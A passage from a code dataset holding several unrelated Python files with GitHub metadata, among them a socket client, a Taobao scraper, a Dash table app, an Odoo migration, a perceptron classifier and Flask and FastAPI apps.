lyr.update_reach_attributes_only(reach)","repo_name":"knu2xs/water-reach-tools","sub_path":"src/water_reach_tools/feature_layers.py","file_name":"feature_layers.py","file_ext":"py","file_size_in_byte":9713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39202624516","text":"import socket\n\nHEADER = 64\nPORT = 5050\nFORMAT = 'utf-8'\nDISCONNECT_MESSAGE = \"disconnect\"\nSERVER = socket.gethostbyname(socket.gethostname())\nADDR = (SERVER, PORT)\n\nclient = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nclient.connect(ADDR)\n\n\n\ndef rec(msg):\n received = str(client.recv(2048).decode(FORMAT))\n print(received)\ndef send(msg):\n message = msg.encode(FORMAT)\n msg_length = len(message)\n send_length = str(msg_length).encode(FORMAT)\n #here we buffer the string sent with blank spaces to be the correct size of the header\n send_length += b' ' * (HEADER - len(send_length))\n #sending length and message\n client.send(send_length)\n client.send(message)\n\n\n\n\nA = \"\"\n\n\ncount = 0\n\n#this will just give us the opening dialogue with the user\nwhile A != \"disconnect\":\n send(\"testing\")\n received = client.recv(2048).decode(FORMAT)\n print(received)\n if \"?\" in received:\n msg = input(\"\\n\")\n send(msg)\n","repo_name":"doncrowley/CSC594","sub_path":"AgentClientProject.py","file_name":"AgentClientProject.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18685217011","text":"import sys\n\nfrom selenium import webdriver\nimport time\nfrom lxml import etree\nfrom pymongo import MongoClient\n\nclient = MongoClient('127.0.0.1', 27017)\ndb = client['tb_db']\ncollection = db.get_collection('taobao')\n\n\ndef get_data(url, page):\n page += 1\n driver.get(url)\n driver.implicitly_wait(10)\n html = etree.HTML(driver.page_source)\n # with open('hello.html', 'w', encoding='utf-8') as f:\n # f.write(driver.page_source)\n # print(html)\n infos = html.xpath('//div[@class=\"item J_MouserOnverReq \"]|//div[@class=\"item J_MouserOnverReq item-ad \"]')\n for info in infos:\n detail = info.xpath('.//div[@class=\"pic\"]/a/img/@alt')[0]\n price = info.xpath('div[2]/div[1]/div[1]/strong/text()')[0]\n sell = info.xpath('div[2]/div[1]/div[@class=\"deal-cnt\"]/text()')[0]\n shop = info.xpath('div[2]/div[3]/div[@class=\"shop\"]/a/span[2]/text()')[0]\n city = info.xpath('div[2]/div[3]/div[@class=\"location\"]/text()')[0]\n # print(detail, price, sell, shop, city)\n # print('='*30)\n data = {\n 'detail': detail,\n 'price': price,\n 'sell': sell,\n 'shop': shop,\n 'city': city\n }\n collection.insert(data)\n if page <= 50:\n next_page(driver.current_url, page)\n else:\n sys.exit()\n\n\ndef next_page(url, page):\n driver.get(url)\n driver.implicitly_wait(10)\n driver.find_element_by_xpath('.//a[@class=\"J_Ajax num icon-tag\"]').click()\n time.sleep(3)\n get_data(driver.current_url, page)\n\n\nif __name__ == '__main__':\n url = 'https://www.taobao.com'\n driver = webdriver.Chrome()\n driver.implicitly_wait(20)\n driver.get(url)\n driver.find_element_by_id('q').clear()\n driver.find_element_by_id('q').send_keys('台式电脑')\n driver.find_element_by_class_name('btn-search').click()\n # print(driver.page_source)\n # driver.current_url获取当前页面的url\n get_data(driver.current_url, 1) # 1表示第一页\n","repo_name":"jiyabing/learning","sub_path":"开班笔记/个人项目/taobao/taobao.py","file_name":"taobao.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71942227948","text":"import dash\nimport dash_table\n# import dash_core_components as dcc\nimport dash_html_components as html\nimport pandas as pd\n\n# url = 'https://raw.githubusercontent.com/plotly/datasets/master/solar.csv'\ndata = 'cubs-2016-baseball.csv'\ndf = pd.read_csv(data)\n\napp = dash.Dash(__name__)\n\nhidden_cols=['OBP','SLG','OPS','OPS+','TB','GDP','HBP','SH','SF','IBB']\n# all_cols = df.columns\nvisible_cols =['Rk','Pos','Name','Age','G','PA','AB','R','H','2B','3B','HR','RBI','SB','CS','BB','SO','BA']\n\n# visible_cols = list(set(all_cols) - set(hidden_cols))\n\napp.layout = html.Div([\n dash_table.DataTable(\n id='table',\n # columns=[{\"name\": i, \"id\": i} for i in df.columns],\n columns=[{\"name\": i, \"id\": i} for i in visible_cols] +\n [{\"name\": i, \"id\": i, 'hideable': True} for i in hidden_cols],\n hidden_columns=hidden_cols,\n data=df.to_dict('records'),\n filter_action=\"native\",\n sort_action=\"native\",\n # sort_mode=\"multi\",\n # hidden_columns=['OBP','SLG','OPS','OPS+','TB','GDP','HBP','SH','SF','IBB'],\n # page_action='native',\n # page_current= 0,\n # page_size= 10,\n\n style_header={'backgroundColor': 'rgb(230, 230, 230)',\n 'fontWeight': 'bold'},\n style_data_conditional=[\n {\n 'if': {\n 'row_index': 'odd'\n },\n 'backgroundColor': 'rgb(248, 248, 248)'\n },\n ],\n style_table={'overflowX': 'scroll'},\n ), # end datatable\n\n # Download Button\n html.Div([\n html.A(html.Button('Download Data', id='download-button'), id='download-link')\n ]),\n])\n\nif __name__ == '__main__':\n app.run_server(debug=True)\n","repo_name":"darrenhusa/dash_datatable_export_test","sub_path":"app-ver1.py","file_name":"app-ver1.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32379259132","text":"from openupgradelib import openupgrade\n\n\n@openupgrade.migrate()\ndef migrate(env, version):\n openupgrade.logged_query(\n env.cr,\n \"\"\"\n UPDATE account_move am\n SET sii_description = COALESCE(ai.sii_manual_description, ai.sii_description),\n sii_state = ai.sii_state,\n sii_csv = ai.sii_csv,\n sii_return = ai.sii_return,\n sii_header_sent = ai.sii_header_sent,\n sii_content_sent = ai.sii_content_sent,\n sii_send_error = ai.sii_send_error,\n sii_send_failed = ai.sii_send_failed,\n sii_refund_type = ai.sii_refund_type,\n sii_refund_specific_invoice_type = ai.sii_refund_specific_invoice_type,\n sii_account_registration_date = ai.sii_account_registration_date,\n sii_registration_key = ai.sii_registration_key,\n sii_registration_key_additional1 = ai.sii_registration_key_additional1,\n sii_registration_key_additional2 = ai.sii_registration_key_additional2,\n sii_property_location = ai.sii_property_location,\n sii_property_cadastrial_code = ai.sii_property_cadastrial_code,\n FROM account_invoice ai\n WHERE ai.id = am.old_invoice_id\"\"\",\n )\n openupgrade.logged_query(\n env.cr,\n \"\"\"\n INSERT INTO account_move_queue_job_rel\n (invoice_id, job_id)\n SELECT am.id, rel.job_id\n FROM account_invoice_validation_job_rel rel\n JOIN account_move am ON am.old_invoice_id = rel.invoice_id\n \"\"\",\n )\n","repo_name":"PlanetaTIC/l10n-spain","sub_path":"l10n_es_aeat_sii_oca/migrations/13.0.1.0.0/post-migration.py","file_name":"post-migration.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"14435829396","text":"#!/usr/bin/env python3\n# Monitors if the TOF and MCP datastreams are alive\n# Stephan Kuschel, Matt Ware, Catherine Saladrigas, 2019\n\nimport numpy as np\nimport pyqtgraph as pg\nimport sqs_nqs_tools.online as online \nimport time\n\n_daqaliveplot = pg.image(title='DAQ alive: Green good, red bad')\nCLRS = ['r','g']\ncmap = pg.ColorMap(np.array([0.,1.]), np.array([pg.colorTuple(pg.Color(c)) for c in CLRS ]) )\n_daqaliveplot.setColorMap( cmap )\ndef plotdaqalive(status):\n '''\n Plots red/green image depending on value of status\n Input:\n ds\n Output:\n None, updates plot window\n '''\n im = np.ones((3,3))*float(status)\n _daqaliveplot.setImage( im, autoLevels=False )\n pg.QtGui.QApplication.processEvents()\n\ndef isAlive(ds):\n # Attempt to get the detector\n try:\n online.getSomeDetector(ds, spec0='SQS_DPU_LIC/CAM/YAG_UPSTR:daqOutput', spec1='data.image.pixels')\n #online.getSomeDetector(ds, spec0='SQS_DPU_LIC/CAM/YAG_UPSTR:output', spec1='data.image.data')\n except Exception as exc:\n print(str(exc))\n print('MCP DATA SOURCE CHANGED!!!')\n print('MCP DATA SOURCE CHANGED!!!')\n print('MCP DATA SOURCE CHANGED!!!')\n return False\n\n # Attempt to get the TOF\n try:\n online.getSomeDetector(ds, spec0='SQS_DIGITIZER_UTC1/ADC/1:network', spec1='digitizers.channel_1_A.raw.samples')\n except Exception as exc:\n print('TOF DATA SOURCE CHANGED!!!')\n print('TOF DATA SOURCE CHANGED!!!')\n print('TOF DATA SOURCE CHANGED!!!')\n return False\n\n # If both succeed return true\n return True\n\ndef main(source):\n '''\n Iterate over the datastream served by source\n Input:\n source: ip address as string\n Output:\n none, updates plots\n '''\n for i, ds in enumerate((online.servedata(source))):\n plotdaqalive( isAlive(ds) )\n\nif __name__=='__main__':\n # Start main function\n main(online.parseSource())\n\n\n\n\n\n\n\n\n","repo_name":"skuschel/XFEL_SQS_NQS_Tools","sub_path":"scripts/daqalive.py","file_name":"daqalive.py","file_ext":"py","file_size_in_byte":1954,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"20001547089","text":"# Написать функцию принимающая на вход неопределенным количеством аргументов\r\n# и именованный аргумент mean_type.\r\n# В зависимости от mean_type вернуть\r\n# среднеарифметическое либо среднегеометрическое.\r\n# Написать программу в виде трех функций.\r\n\r\n\r\ndef geometr(args):\r\n geom = 1\r\n for i in args:\r\n geom *= i ** (1 / len(args))\r\n return geom\r\n\r\n\r\ndef average(args):\r\n summ = 0\r\n for i in args:\r\n summ += i\r\n aver = summ / (len(args))\r\n return aver\r\n\r\n\r\ndef numbers_operation(*args, **kwargs):\r\n for key, value in kwargs.items():\r\n k = value\r\n if k == 'average':\r\n print(average(args))\r\n elif k == 'geometr':\r\n print(geometr(args))\r\n\r\n\r\n\r\n\r\n\r\n\r\nnumbers_operation(5, 8, 55, 67, 8, 2, 3, mean_type='geometr')\r\n","repo_name":"macson777/test_repo","sub_path":"src/task_8_1.py","file_name":"task_8_1.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28358680282","text":"from fastapi import FastAPI, Depends, HTTPException\nfrom pydantic import BaseModel \n\nfrom fastapi.middleware.cors import CORSMiddleware\nimport requests \n\nfrom dotenv import load_dotenv\nimport os \n\nload_dotenv()\n\napp = FastAPI()\n\norigins = [\n \"http://localhost:3000\", # frontend endpoint\n]\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=origins,\n allow_credentials=True,\n allow_methods=[\"POST\",\"GET\",],\n allow_headers=[\"*\"],\n)\n\nclass Food(BaseModel):\n id:str\n name:str\n\ngrocery_list = [\n {\"id\":\"001\",\"name\":\"oranges\"},\n {\"id\":\"002\",\"name\":\"bread\"}\n]\n\n## Endpoints\n@app.get(\"/\")\nasync def welcome():\n return \"Who's Hungry!\"\n\n@app.get(\"/groceries\")\nasync def get_groceries_list():\n return grocery_list\n\n@app.post('/add')\nasync def add_item(item:Food):\n grocery_list.append(item)\n return \"Added \" + item.name\n\n@app.get('/recipes')\nasync def find_recipes(item:str): \n result = []\n response = find_by_ingredients(item)\n\n for recipes in response:\n recipe = {}\n recipe[\"title\"] = recipes[\"title\"]\n recipe[\"image\"] = recipes[\"image\"]\n result.append(recipe)\n return result\n\n\ndef find_by_ingredients(ingredients):\n url= 'https://api.spoonacular.com/recipes/findByIngredients'\n headers = {\n 'Content-Type':'application/json',\n 'x-api-key':os.getenv('SPOONACULAR_API_KEY') }\n parameters ={\n 'ingredients': ingredients}\n\n response = requests.get(url, headers=headers, params=parameters)\n\n if (response.status_code == 200):\n print(\"The request was a success!\")\n\n elif (response.status_code == 404):\n print(\"Result not found!\")\n\n return response.json()\n","repo_name":"granthill7/Grocery-Store-Demo","sub_path":"backend/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9335449607","text":"import numpy as np\n\n\nclass Error(Exception):\n \"\"\"Base class for exceptions in this module.\"\"\"\n pass\n\n\nclass NoFitError(Error):\n \"\"\"Exception raised for errors in the input.\n\n Attributes:\n expression -- input expression in which the error occurred\n message -- explanation of the error\n \"\"\"\n\n def __init__(self, expression, message):\n self.expression = expression\n self.message = message\n\n\nclass Perceptron:\n def __init__(self, dataset, weight_random_seed=[-0.5, 0.5], bias=-1, degree=0, learn_tax=0.1, split=\"without\"):\n self.__dataset = dataset\n self.__learn_tax = learn_tax\n self.__degree = degree\n self.__bias = bias\n self.__x_training, self.__y_training, self.__x_test, self.__y_test = self.generate_train_test_dataset(split)\n self.__weights = self.generate_weights(weight_random_seed)\n self.__fit = False\n self.__number_of_weights_adjust = 0\n self.__number_of_epochs = 0\n\n def fit(self):\n epoch = 1\n error = True\n number_of_rows = self.__x_training.shape[0]\n number_of_weights_adjust = 0\n while(error):\n print(\"------ Epoch {} ------\".format(epoch))\n epoch += 1\n erros_count = 0\n\n for index in range(number_of_rows):\n x_enter = np.insert(self.__x_training[index], 0, self.__bias)\n u = (x_enter * self.__weights).sum()\n\n result = self.activation_function(u)\n expected_result = self.__y_training[index]\n\n if(result != expected_result):\n erros_count += 1\n number_of_weights_adjust += 1\n self.__weights = self.adjust_weights(\n x_enter, result, expected_result)\n print(\"### Weights {}\".format(self.__weights))\n\n print(\"### Weights Adjust {}\".format(number_of_weights_adjust))\n\n if(erros_count == 0):\n self.__number_of_weights_adjust = number_of_weights_adjust\n self.__number_of_epochs = epoch\n error = False\n\n print('{0} \\nTotal Weights\\' adjust={1}'.format(\n '-' * 30, number_of_weights_adjust))\n self.__fit = True\n\n def fit2(self,epoch):\n cont = 0\n number_of_rows = self.__x_training.shape[0]\n number_of_weights_adjust = 0\n\n for cont in range(epoch):\n print(\"------ Epoch {} ------\".format(cont+1))\n for index in range(number_of_rows):\n x_enter = np.insert(self.__x_training[index], 0, self.__bias)\n u = (x_enter * self.__weights).sum()\n\n result = self.activation_function(u)\n expected_result = self.__y_training[index]\n\n if(result != expected_result):\n number_of_weights_adjust += 1\n self.__weights = self.adjust_weights(\n x_enter, result, expected_result)\n print(\"### Weights {}\".format(self.__weights))\n print(\"### Weights Adjust {}\".format(number_of_weights_adjust))\n \n self.__number_of_weights_adjust = number_of_weights_adjust\n self.__number_of_epochs = epoch\n self.__fit = True\n\n def predict(self):\n number_of_rows = self.__x_test.shape[0]\n results = np.array([], np.int)\n for index in range(number_of_rows):\n x_enter = np.insert(self.__x_test[index], 0, self.__bias)\n u = (x_enter * self.__weights).sum()\n results = np.append(results, self.activation_function(u)) \n\n return results\n\n def get_confusion_matrix(self, reais, preditos, labels):\n # não implementado\n if len(labels) > 2:\n return None\n\n if len(reais) != len(preditos):\n return None\n \n # considerando a primeira classe como a positiva, e a segunda a negativa\n true_class = labels[0]\n negative_class = labels[1]\n\n # valores preditos corretamente\n tp = 0\n tn = 0\n \n # valores preditos incorretamente\n fp = 0\n fn = 0\n \n for (indice, v_real) in enumerate(reais):\n v_predito = preditos[indice]\n\n # se trata de um valor real da classe positiva\n if v_real == true_class:\n tp += 1 if v_predito == v_real else 0\n fp += 1 if v_predito != v_real else 0\n else:\n tn += 1 if v_predito == v_real else 0\n fn += 1 if v_predito != v_real else 0\n \n return np.array([\n # valores da classe positiva\n [ tp, fp ],\n # valores da classe negativa\n [ fn, tn ]\n ])\n\n def get_accuracy(self, confusion_matrix):\n tp = confusion_matrix[0][0]\n tn = confusion_matrix[1][1]\n fp = confusion_matrix[0][1]\n fn = confusion_matrix[1][0]\n\n return ((tp + tn) / (tp+ fp + tn + fn))\n \n def get_precision(self, confusion_matrix):\n tp = confusion_matrix[0][0]\n fp = confusion_matrix[0][1]\n\n return (tp / (tp + fp))\n \n def get_recall(self, confusion_matrix):\n tp = confusion_matrix[0][0]\n fn = confusion_matrix[1][0]\n\n return (tp / (tp + fn))\n\n def get_f_score(self, precision, recall):\n return (2 * (precision * recall) / \n (precision + recall))\n\n def activation_function(self, value):\n return (1 if value >= self.__degree else 0)\n\n def adjust_weights(self, x_enter, result, expected_result):\n new_weights = self.__weights + \\\n (self.__learn_tax * (expected_result - result) * x_enter)\n return new_weights\n\n def generate_weights(self, weight_random_seed):\n return np.random.uniform(low=weight_random_seed[0], high=weight_random_seed[1], size=3)\n\n def generate_train_test_dataset(self, split):\n # verificar se a geração de números randomicos não se repete para os dataset de treino e teste de forma que os datasets gerados estejam com valores repetidos ou nem usem o tamanho total do dataset\n dataset_len_row = self.__dataset.shape[0]\n # condição a fim de testes com a entada pequena da aula\n if(split == \"without\"):\n x_training = np.array((self.__dataset[0:, :2]))\n y_training = np.array((self.__dataset[0:, 2:]))\n return (x_training, y_training, np.array((0)), np.array((0)))\n\n tirthy_percenty = round(dataset_len_row * 0.3)\n seventy_percenty = round(dataset_len_row * 0.7)\n\n training_idx = np.random.randint(\n dataset_len_row, size=seventy_percenty)\n test_idx = np.random.randint(dataset_len_row, size=tirthy_percenty)\n\n training, test = self.__dataset[training_idx,\n :], self.__dataset[test_idx, :]\n x_training = np.array((training[0:, :2]))\n y_training = np.array((training[0:, 2:]))\n x_test = np.array((test[0:, :2]))\n y_test = np.array((test[0:, 2:]))\n\n return (x_training, y_training, x_test, y_test)\n\n def generate_hyperplane(self):\n if(not self.__fit):\n raise NoFitError(self.__fit, \"Error: Perceptron isn't trained\")\n \n slope = -(self.__weights[0] / self.__weights[2]) / (self.__weights[0] / self.__weights[1])\n intercept = -(self.__weights[0] / self.__weights[2])\n \n x_min = np.amin(self.__x_training[:,:1])\n x_max = np.amax(self.__x_training[:,:1])\n\n x = np.linspace(x_min,x_max)\n #y =mx+c, m is slope and c is inte\n y = [(slope * i) - intercept for i in x]\n return (x, y)\n \n @property\n def degree(self):\n return self.__degree\n\n @property\n def x_training(self):\n return self.__x_training\n\n @property\n def y_training(self):\n return self.__y_training\n\n @property\n def x_test(self):\n return self.__x_test\n\n @property\n def y_test(self):\n return self.__y_test\n\n @property\n def weights(self):\n return self.__weights\n\n @property\n def number_of_weights_adjust(self):\n return self.__number_of_weights_adjust\n\n @property\n def number_of_epochs(self):\n return self.__number_of_epochs\n\n\n\nif __name__ == \"__main__\":\n file = np.fromfile(\"./rna-2020.1-pp2-data/data2.txt\")\n file = file.reshape((int(file.shape[0] / 3), 3))\n conjunto_treinamento_aula = np.array([[2, 2, 1], [4, 4, 0]])\n b = Perceptron(dataset=file,split=\"holdout\")\n #b.fit()\n b.fit2(100)\n confusion_matrix = b.get_confusion_matrix(b.y_test, b.predict(), [0, 1])\n accuracy = b.get_accuracy(confusion_matrix)\n precision = b.get_precision(confusion_matrix)\n recall = b.get_recall(confusion_matrix)\n f_score = b.get_f_score(precision, recall)\n print(accuracy, precision, recall, f_score)\n # print(\"## reta\")\n # print(b.x_training.shape[0])\n\ndef questao_2():\n file = np.fromfile(\"./rna-2020.1-pp2-data/data2.txt\")\n file = file.reshape((int(file.shape[0] / 3), 3))\n print(file)\n learn_taxs = [0.4, 0.1, 0.01]\n weights = [[-100, 100], [-1, 1], [-0.5, 0.5]]\n\n results = {}\n\n for tax in learn_taxs:\n for weight in weights:\n key = str(tax) + str(weight)\n results[key] = []\n print(key)\n\n for i in range(0, 101):\n b = Perceptron(\n dataset=file, weight_random_seed=weight, learn_tax=tax)\n b.fit()\n\n results[key].append({\n 'hyperplane': b.generate_hyperplane(),\n 'number_of_weights_adjust': b.number_of_weights_adjust,\n 'number_of_epochs': b.number_of_epochs\n })\n print(results)","repo_name":"adhamlucas/supervised-learning-pp2","sub_path":"ellolib.py","file_name":"ellolib.py","file_ext":"py","file_size_in_byte":9847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74740835626","text":"\"\"\"\nlibCTIOSTransm.py\n=============----\n\nauthor : Sylvie Dagoret-Campagne\naffiliation : LAL/CNRS/IN2P3/FRANCE\nCollaboration : DESC-LSST\n\nPurpose : Provide the various transmission usefull\nupdate : October 17 : set the path with environnment variables\n\n\"\"\"\n\n\nimport os\nimport re\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom astropy.io import fits\nfrom astropy.io import ascii\n\nfrom scipy.interpolate import UnivariateSpline\nfrom scipy.interpolate import interp1d\n\nhome = os.environ['HOME']+'/' \npath_ctioanajun2017=os.environ['CTIOAnaJun2017DIR']\npath_CTIOtransm=path_ctioanajun2017+'/spectrumsim/CTIOThroughput'\n\n#\nfilename_qe = \"qecurve.txt\" \nfilename_FGB37=\"FGB37.txt\"\nfilename_RG175=\"RG175.txt\"\nfilename_Throughput='ctio_throughput.txt'\nfilename_mirrors='lsst_mirrorthroughput.txt'\n\nWLMIN=300.\nWLMAX=1100.\n\n#-----------------------------------------------------------------------------\ndef Get_QE():\n \n filename=os.path.join(path_CTIOtransm,filename_qe)\n \n data_qe=ascii.read(filename) \n x=data_qe[\"col1\"]\n y=data_qe[\"col2\"]/100.\n indexes = np.where(np.logical_and(x>WLMIN,xWLMIN,xWLMIN,xWLMIN,xWLMIN,x0 and len(department_term.strip())==0:\n print(\"Search advisor by company = \" + company_term)\n for person in providers:\n if company_term in person[\"company\"].lower():\n results.append(person)\n results_id.add(person[\"id\"])\n elif len(department_term.strip())>0 and len(company_term.strip())==0:\n print(\"Search advisor by department = \" + department_term)\n for person in providers:\n if department_term in person[\"department\"].lower():\n results.append(person)\n results_id.add(person[\"id\"])\n else:\n for person in providers:\n if company_term in person[\"company\"].lower():\n if department_term in person[\"department\"].lower():\n results.append(person)\n results_id.add(person[\"id\"])\n global company_search_term\n global department_search_term\n company_search_term = None\n department_search_term = None\n\n return jsonify(matches=results)\n\n@app.route('/create_profile')\ndef create_profile():\n if current_advisor_profile is None:\n return render_template(\"create_profile.html\", current_user={})\n else:\n return render_template(\"create_profile.html\", current_user=current_advisor_profile)\n # return render_template(\"create_profile.html\")\n\n@app.route('/save_advisor', methods=['GET', 'POST'])\ndef save_advisor():\n global providers_current_id\n global providers\n global current_advisor_profile\n\n advisor_data = request.get_json()[\"entry\"]\n current_advisor_profile = {\n \"id\": providers_current_id,\n \"name\": advisor_data[\"name\"],\n \"university\": advisor_data[\"university\"],\n \"department\": advisor_data[\"department\"],\n \"company\": advisor_data[\"company\"],\n \"interests\": advisor_data[\"interests\"],\n \"availability\": advisor_data[\"availability\"],\n \"bookmarked\": False,\n }\n\n providers.append(current_advisor_profile)\n providers_current_id += 1\n return jsonify(advisors=providers, current=current_advisor_profile)\n\n@app.route('/edit_profile', methods=['GET', 'POST'])\ndef edit_profile():\n global providers_current_id\n global providers\n global current_advisor_profile\n advisor_data = request.get_json()\n current_advisor_profile = advisor_data\n\n for person in providers:\n if person[\"id\"] == advisor_data[\"id\"]:\n person[\"name\"] = advisor_data[\"name\"]\n person[\"university\"] = advisor_data[\"university\"]\n person[\"company\"] = advisor_data[\"company\"]\n person[\"department\"] = advisor_data[\"department\"]\n person[\"interests\"] = advisor_data[\"interests\"]\n person[\"availability\"] = advisor_data[\"availability\"]\n return jsonify(current_user=current_advisor_profile)\n\n@app.route('/delete_profile', methods=['GET', 'POST'])\ndef delete_profile():\n global providers_current_id\n global providers\n global current_advisor_profile\n\n delete_id = request.get_json()[\"id\"]\n\n for x in range(len(providers)):\n if providers[x][\"id\"] == int(delete_id):\n providers.remove(providers[x])\n\n current_advisor_profile = None\n providers_current_id -= 1\n return jsonify(current_user={})\n\n@app.route('/user_profile')\ndef user_profile():\n if current_advisor_profile is None:\n return render_template(\"user_profile.html\", current_user={})\n else:\n return render_template(\"user_profile.html\", current_user=current_advisor_profile)\n\n@app.route('/set_search_terms', methods=['GET', 'POST'])\ndef set_search_terms():\n global company_search_term\n global department_search_term\n\n company_search_term = request.get_json()[\"company\"]\n department_search_term = request.get_json()[\"department\"]\n return jsonify(data={})\n\n@app.route('/set_bookmark', methods=['GET', 'POST'])\ndef set_bookmark():\n global providers\n\n add_ids = request.get_json()[\"add\"]\n remove_ids = request.get_json()[\"remove\"]\n\n for person in providers:\n if person[\"id\"] in add_ids:\n person[\"bookmarked\"] = True\n if person[\"id\"] in remove_ids:\n person[\"bookmarked\"] = False\n return jsonify(data={})\n\n@app.route('/coffee/')\ndef coffee(id):\n for person in providers:\n if person[\"id\"] == int(id):\n requested_advisor = person\n return render_template(\"coffee.html\", requested_advisor=requested_advisor)\n\n@app.route('/set_coffee', methods=['GET', 'POST'])\ndef set_coffee():\n global meeting_requests\n global meeting_id\n addition = request.get_json()[\"add\"]\n print(addition)\n addition['id'] = meeting_id\n meeting_id = meeting_id + 1\n meeting_requests.insert(0, addition)\n return jsonify(data=meeting_requests)\n\n@app.route('/all_coffee')\ndef all_coffee():\n global meeting_requests\n return render_template(\"all_coffee.html\", coffee=meeting_requests)\nif __name__ == '__main__':\n app.run(host='0.0.0.0', debug=True)\n","repo_name":"tigerlily-he/CS6998_hw3","sub_path":"CS6998_hw3.py","file_name":"CS6998_hw3.py","file_ext":"py","file_size_in_byte":7084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34844937407","text":"import math\n\nfrom matplotlib.offsetbox import AnchoredText\n\nfrom Lab10.core.Elements.Network import Network\nfrom Lab10.core.Elements.Connection import Connection\nimport random as rand\nimport matplotlib.pyplot as plt\nimport statistics as st\nimport pandas as pd\nimport numpy as np\nimport copy\nfrom math import inf\n\nBIT_RATE_100G = 100e9\n\ndef truncate(number, decimals=0):\n \"\"\"\n Returns a value truncated to a specific number of decimal places.\n \"\"\"\n if not isinstance(decimals, int):\n raise TypeError(\"decimal places must be an integer.\")\n elif decimals < 0:\n raise ValueError(\"decimal places has to be 0 or more.\")\n elif decimals == 0:\n return math.trunc(number)\n\n factor = 10.0 ** decimals\n return math.trunc(number * factor) / factor\n\n\ndef network_initialization(path_nodes, weighted_path, connections):\n net = Network(path_nodes)\n net.connect()\n net.weighted_path = weighted_path\n net.update_routing_space(None) # Restore routing space\n return net\n\n\ndef get_random_connections():\n connections_a = []\n nodes = 'ABCDEF'\n for i in range(0, 100):\n input_rand = rand.choice(nodes)\n while True:\n output_rand = rand.choice(nodes)\n if input_rand != output_rand:\n break\n connections_a.append(Connection(input_rand, output_rand, 1e-3))\n return connections_a\n\n\ndef plot_snr_and_bit_rate(strategy, connections):\n snr_connections = [c.snr for c in connections]\n plt.figure()\n plt.hist(snr_connections, label='SNR distribution')\n plt.title('SNR distribution with ' + str(strategy) + ' rate')\n plt.xlabel('SNR [dB]')\n plt.ylabel('Number of connections')\n plt.show()\n\n bit_rate_connections = [c.bit_rate for c in connections if c.bit_rate != 0]\n f, ax = plt.subplots(1, 1)\n ax.hist(bit_rate_connections, label='Bit rate histogram')\n plt.title('Bit rate of accepted connections - ' + str(strategy) + ' rate')\n plt.xlabel('bit rate [bps]')\n plt.ylabel('Number of connections')\n avg_bit_rate = truncate(st.mean(bit_rate_connections) / (1e9), 3)\n tot_capacity = truncate((sum(bit_rate_connections) / (1e9)), 3)\n print('Strategy = ' + str(strategy) + ' rate\\n' +\n \"Overall average bit rates of accepted connections: \", avg_bit_rate, 'Gbps\\n' +\n \"Total capacity allocated into the network: \", tot_capacity, 'Gbps')\n # text\n anchored_text = AnchoredText(\n 'Average bit rate = ' + str(avg_bit_rate) + 'Gbps' + '\\nTotal capacity allocated = ' + str(\n tot_capacity) + 'Gbps', loc='upper left', pad=0.5, prop=dict(size=9))\n ax.add_artist(anchored_text)\n plt.show()\n\n\ndef plot_traffic_matrix(traffic_matrix, strategy, M):\n a = pd.DataFrame.from_dict(traffic_matrix).to_numpy(dtype=float, na_value=None).astype(float)\n fig, ax = plt.subplots()\n\n for i in range(pd.DataFrame.from_dict(traffic_matrix).shape[0]):\n for j in range(pd.DataFrame.from_dict(traffic_matrix).shape[1]):\n text = ax.text(j, i, a[i, j],\n ha=\"center\", va=\"center\", color=\"w\")\n x_labels = ['A', 'B', 'C', 'D', 'E', 'F']\n y_labels = ['A', 'B', 'C', 'D', 'E', 'F']\n # Create dummy x values, with a value for every label entry\n x = np.r_[:len(x_labels)]\n y = np.r_[:len(y_labels)]\n # Change the xticks and yticks as desired\n plt.title('Traffic matrix with ' + str(strategy) + ' rate and M = ' + str(M))\n plt.xticks(x, x_labels)\n plt.yticks(y, y_labels)\n cmap = plt.cm.jet\n cmap = copy.copy(plt.cm.get_cmap(\"jet\"))\n cmap.set_bad('orange', 1.)\n ax.imshow(a, interpolation='nearest', cmap=cmap)\n\n\ndef traffic_matrix_initialization(network, M):\n node_number = len(network.nodes)\n traffic_matrix = {}\n for node in network.nodes.keys():\n traffic_matrix[node] = {}\n for node_ in network.nodes.keys():\n if node != node_:\n traffic_matrix[node][node_] = BIT_RATE_100G * M\n else:\n traffic_matrix[node][node_] = inf\n return traffic_matrix\n\ndef wavelength_congestion(network, M, strategy):\n # Wavelength congestion flex\n occupancy = []\n for label in network.lines.keys():\n coutner = 0\n line_state = network.lines[label].state\n for c in (line_state):\n coutner += c\n occupancy.append((1 - (coutner / len(line_state))) * 100)\n print(label + \" \" + str((1 - (coutner / len(line_state))) * 100))\n plt.figure()\n plt.scatter(list(network.lines.keys()), occupancy, label='Wavelength congestion')\n plt.xlabel('Lines')\n plt.ylabel('Congestion [%]')\n plt.title('Wavelength congestion '+strategy+' rate with M = ' + str(M))\n plt.xticks(list(network.lines.keys()))\n plt.grid(True, linewidth=0.5, linestyle='--')\n 